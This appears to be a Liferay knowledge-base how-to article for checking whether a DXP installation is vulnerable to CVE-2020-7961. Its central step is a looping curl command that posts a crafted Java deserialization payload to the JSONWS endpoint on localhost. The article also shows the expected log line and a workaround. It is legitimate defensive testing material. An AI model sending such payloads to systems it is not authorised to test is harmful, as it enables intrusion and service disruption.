Submit Feedback
Legacy Knowledge Base
Published Jun. 30, 2025

How to test for vulnerabilitity to CVE-2020-7961

Written By

Neil Cuzon

How To articles are not official guidelines or officially supported documentation. They are community-contributed content and may not always reflect the latest updates to Liferay DXP. We welcome your feedback to improve How To articles!

While we make every effort to ensure this Knowledge Base is accurate, it may not always reflect the most recent updates or official guidelines.We appreciate your understanding and encourage you to reach out with any feedback or concerns.

Legacy Article

You are viewing an article from our legacy "FastTrack" publication program, made available for informational purposes. Articles in this program were published without a requirement for independent editing or verification and are provided"as is" without guarantee.

Before using any information from this article, independently verify its suitability for your situation and project.

Issue

  • We would like to determine if we are vulnerable to CVE-2020-7961.

Environment

  • DXP 7.3, DXP 7.2,  DXP 7.1, DXP 7.0

Resolution

  • The steps to test for vulnerability to CVE-2020-7961 are as follows:
     
    1. Start your Liferay bundle
     
    2. Open a new terminal window and ran the following command: 
    while true; do curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' --data-binary 'cmd={"/expandocolumn/add-column":{}}&formDate=0&tableId=0&name=&type=0&%2bdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap[aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707ffffff7]"}' http://127.0.0.1:8080/api/jsonws/invoke > /dev/null 2>&1; done
     
    3. Below is the expected response, seeing it means you are not vulnerable to it:
    ERROR [http-nio-8080-exec-7][JSONWebServiceServiceAction:126] com.mchange.v2.c3p0.WrapperConnectionPoolDataSource is not allowed to be instantiated

    4. If the Liferay Portal becomes unresponsive, please contact Liferay Support.

    Note: An existing workaround would be to disable access to the whole JSONWS component through portal-ext.properties: jsonws.servlet.hosts.allowed=Not/Available.
    However, setting this to false will prevent portlets that make JSON web service calls from working.

Additional Information

 

 

Did this article resolve your issue ?
Legacy Knowledge Base
Did this article resolve your issue ?